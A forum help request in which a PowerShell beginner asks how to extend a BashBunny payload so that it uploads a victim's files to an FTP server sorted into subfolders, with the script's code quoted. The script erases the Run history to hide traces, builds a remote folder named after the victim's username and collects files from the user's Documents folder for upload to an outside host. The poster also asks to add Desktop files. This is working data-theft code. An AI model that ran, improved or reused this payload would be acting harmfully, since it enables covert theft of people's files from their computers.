Help with powershell

sajansen

Hey,

I was looking in to a BashBunny payload that uploads files to a ftp server. I would like to edit it a little bit to create an extra folder where to it uploads.

Right now it creates /<username>/ and puts everything there. What i would like to do is /<username>/<subfolder1>/ and put everything there. Eventually i would like to add a second folder to the script by just simply copying the same script and change the folder from lets say Documents to Desktop and upload that as wel. And the subfolders are so everything looks nice on the FTP side. not everything mashed into one folder.

PS. I'm new to powershell so im sorry if its a stupid question. Also my first post here... so let me know if i need to post this somewhere else :)

#Author:        Nutt

clear
#Clear Run History
remove-item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Credit to dkittell - https://gist.github.com/dkittell/f029b6c7d1c46ebcffcb
# I've modified a bit of his code to create a directory with the username, I'm sure there is a better way to do this but not sure how

# FTP Server Variables - edit the xxxxx
$FTPHost = 'XXXXXXXXX' + $env:username + '/'
$FTPUser = 'XXXXX'
$FTPPass = 'XXXXX'

#Directory where to find files to upload
$UploadFolder = "$env:userprofile\Documents\test\"

$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass)  

$SrcEntries = Get-ChildItem $UploadFolder -Recurse
$Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer}
$SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer}

#Creates Folder with victims Username
try {
$makeDirectory = [System.Net.WebRequest]::Create($FTPHost);
$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
$makeDirectory.GetResponse();
}
catch [Net.WebException] {}